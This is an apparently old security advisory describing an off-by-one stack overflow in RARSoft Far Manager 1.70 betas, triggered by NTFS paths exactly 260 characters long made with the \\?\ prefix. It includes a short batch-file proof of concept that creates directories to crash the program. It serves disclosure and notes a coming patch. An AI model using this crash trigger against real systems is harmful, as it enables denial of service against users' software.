COMMAND

	Far buffer overflow

SYSTEMS AFFECTED

	RARSoft Far Manager 1.70beta1 and prior

PROBLEM

	In 3APA3A [3APA3A@SECURITY.NNOV.RU} advisory :
	
	http://www.security.nnov.ru
	         /\_/\
	        { , . }     |\
	+--oQQo->{ ^ }<-----+ \
	|  ZARAZA  U  3APA3A   }
	+-------------o66o--+ /
	                    |/
	
	
	--snip--
	
	NTFS file system allows to create paths of almost unlimited length.  But
	Windows API does not allow  path  longer  than  256  bytes.  To  prevent
	Windows API from checking requested path \\?\  prefix  may  be  used  to
	filename. This is documented feature of Windows API. Paths  longer  than
	260 characters will cause FAR to crash.  Far  1.70beta4  implements  the
	check of path length and does not allows to use paths  longer  than  160
	characters. But due to bug in coding it's still possible to exploit  FAR
	by using path  of  exactly  260  characters  (off-by-one  stack  pointer
	overflow).
	
	 Exploit
	 =======
	
	This .bat file demonstrates vulnerability (it creates directory  with  2
	subdirectories, first one will cause Far 1.70beta1 to crash, second  one
	will cause Far 1.70beta4 to crash.
	
	@echo off
	SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
	mkdir \\?\c:\%A%
	mkdir \\?\c:\%A%\%A%
	mkdir \\?\c:\%A%\%B%\
	
	
	--snap--

SOLUTION

	Will be patched in 1.70beta5 when released